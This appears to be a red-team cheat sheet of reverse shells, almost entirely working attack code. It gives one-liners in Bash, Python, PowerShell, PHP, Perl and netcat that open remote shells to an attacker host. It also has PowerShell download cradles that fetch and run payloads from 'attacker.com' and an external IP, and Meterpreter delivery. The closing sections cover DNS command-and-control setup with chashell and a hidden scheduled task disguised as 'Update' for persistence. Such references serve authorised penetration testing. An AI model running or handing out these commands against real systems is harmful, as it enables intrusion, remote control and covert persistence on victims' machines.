Reverse Shells

Bash

/bin/bash -c '/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f

Python

IPv4

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);s.close()
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE","/dev/null");pty.spawn("/bin/bash");s.close()

IPv6

import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);s.close()
import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE","/dev/null");pty.spawn("/bin/bash");s.close()

PowerShell

$client = New-Object System.Net.Sockets.TCPClient("10.10.13.37",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
$socket = new-object System.Net.Sockets.TcpClient("10.10.13.37",1337);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
    $writer.Flush();
    $read = $null;
    $res = ""
    while($stream.DataAvailable -or $read -eq $null) {
        $read = $stream.Read($buffer, 0, 1024)
    }
    $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
    if(!$out.equals("exit")){
        $args = "";
        if($out.IndexOf(' ') -gt -1){
            $args = $out.substring($out.IndexOf(' ')+1);
            $out = $out.substring(0,$out.IndexOf(' '));
            if($args.split(' ').length -gt 1){
                $pinfo = New-Object System.Diagnostics.ProcessStartInfo
                $pinfo.FileName = "cmd.exe"
                $pinfo.RedirectStandardError = $true
                $pinfo.RedirectStandardOutput = $true
                $pinfo.UseShellExecute = $false
                $pinfo.Arguments = "/c $out $args"
                $p = New-Object System.Diagnostics.Process
                $p.StartInfo = $pinfo
                $p.Start() | Out-Null
                $p.WaitForExit()
                $stdout = $p.StandardOutput.ReadToEnd()
                $stderr = $p.StandardError.ReadToEnd()
                if ($p.ExitCode -ne 0) {
                    $res = $stderr
                } else {
                    $res = $stdout
                }
            }
            else{
                $res = (&"$out" "$args") | out-string;
            }
        }
        else{
            $res = (&"$out") | out-string;
        }
        if($res -ne $null){
        $writer.WriteLine($res)
    }
    }
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()

#$a=New-Object System.Net.Sockets.TcpClient("10.10.13.37",1337);if($a -eq $null){exit 1}$b=$a.GetStream();$c=New-Object System.IO.StreamWriter($b);$d=New-Object System.Byte[] 1024;$e=New-Object System.Text.AsciiEncoding;do{$c.Flush();$f=$null;$g="";while($b.DataAvailable -or $f -eq $null) {$f=$b.Read($d,0,1024)}$h=$e.GetString($d,0,$f).Replace("`r`n","").Replace("`n","");if(!$h.equals("exit")){$i="";if($h.IndexOf(" ") -gt -1){$i=$h.Substring($h.IndexOf(" ")+1);$h=$h.Substring(0,$h.IndexOf(" "));if($i.Split(" ").Length -gt 1){$k=New-Object System.Diagnostics.ProcessStartInfo;$k.FileName="cmd.exe";$k.RedirectStandardError=$true;$k.RedirectStandardOutput=$true;$k.UseShellExecute=$false;$k.Arguments="/c $h $i";$p=New-Object System.Diagnostics.Process;$p.StartInfo=$k;$p.Start()|Out-Null;$p.WaitForExit();$l=$p.StandardOutput.ReadToEnd();$m=$p.StandardError.ReadToEnd();if($p.ExitCode -ne 0){$g=$m}else{$g=$l}}else{$g=(&"$h" "$i")|Out-String;}}else{$g=(&"$h")|Out-String;}if($g -ne $null){$c.WriteLine($g)}}}while(!$h.equals("exit"))$c.close();$a.close();$b.Dispose()

Download Cradles

PowerShell DNS Delivery

'powershell $a=""""http://10.10.13.37/payload.txt"""";iex(Resolve-DnsName """"cradle.attacker.com"""" 16).Strings[0]'

wmiexec.py -silentcommand -nooutput megacorp.local/snovvcrash:'Passw0rd!'@PC01.megacorp.local 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $url=""""http://10.10.13.37/run.ps1"""";iex(resolve-dnsname """"cradle.attacker.com"""" 16).strings[0];Invoke-RunPayload http://10.10.13.37/payload.txt'

PHP

<?php echo passthru("/bin/bash -c '/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'"); ?>

Perl

use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};

C

C#

Netcat

$ {nc.tradentional|nc|ncat|netcat} <LHOST> <LPORT> {-e|-c} /bin/bash

Meterpreter

unicorn

$ python3 unicorn.py windows/meterpreter/reverse_https 10.10.13.37 443
$ sudo msfconsole -qr unicorn.rc
PS > IEX(New-Object Net.WebClient).DownloadString('powershell_attack.txt')

Listeners

$ {nc.tradentional|nc|ncat|netcat} [-6] -lvnp <LPORT>

Transport over DNS

dnscat2

chashell

Buy and configure DNS (e.g., c2cdomain.net):

A * -> <IP>
A @ -> <IP>
A chashell -> <IP>
NS c -> chashell.c2cdomain.net

Get dependencies:

$ export GOPATH=/home/snovvcrash/code/go
$ export PATH=$GOPATH:$GOPATH/bin:$PATH
$ go get -v -u github.com/golang/dep/cmd/dep
$ go get github.com/mitchellh/gox
$ cd $GOPATH/src/github.com/golang/dep
$ go install ./...

Clone chashell into $GOPATH/src (otherwise, dep will error out):

$ git clone https://github.com/sysdream/chashell $GOPATH/src/chashell
$ cd $GOPATH/src/chashell

Build binaries:

$ export ENCRYPTION_KEY=$(python -c 'from os import urandom; print(urandom(32).encode("hex"))')
$ export DOMAIN_NAME=c.c2cdomain.net
$ make build-all OSARCH="linux/amd64"

Run server on Attacker:

$ cd release/
$ sudo systemctl stop systemd-resolved
$ sudo ./chaserv_linux_amd64

Run client on Victim:

$ ./chashell_linux_amd64

Tools

VbRev

xc

Listen:

$ rlwrap ./xc -l -p 443

Launch:

PS > Start-Process -NoNewWindow .\xc.exe "10.10.13.38 443"

cliws

Reverse mode:

$ rlwrap -cAr ./cliws -l 8000
Cmd > .\cliws.exe -r ws://10.10.13.37:8000 powershell

Create a scheduled task for persistence:

$ while true; do sudo netstat -tulpan | grep LISTEN | grep 8080 > /dev/null || rlwrap -cAr ./cliws -l 8080; done

$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Hours 1)
$settings = New-ScheduledTaskSettingsSet -Hidden -MultipleInstances Queue
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden C:\Windows\Tasks\cliws.exe -r ws://10.10.13.37:8080 powershell"
Register-ScheduledTask -TaskName "Update" -Trigger $trigger -Settings $settings -Action $action
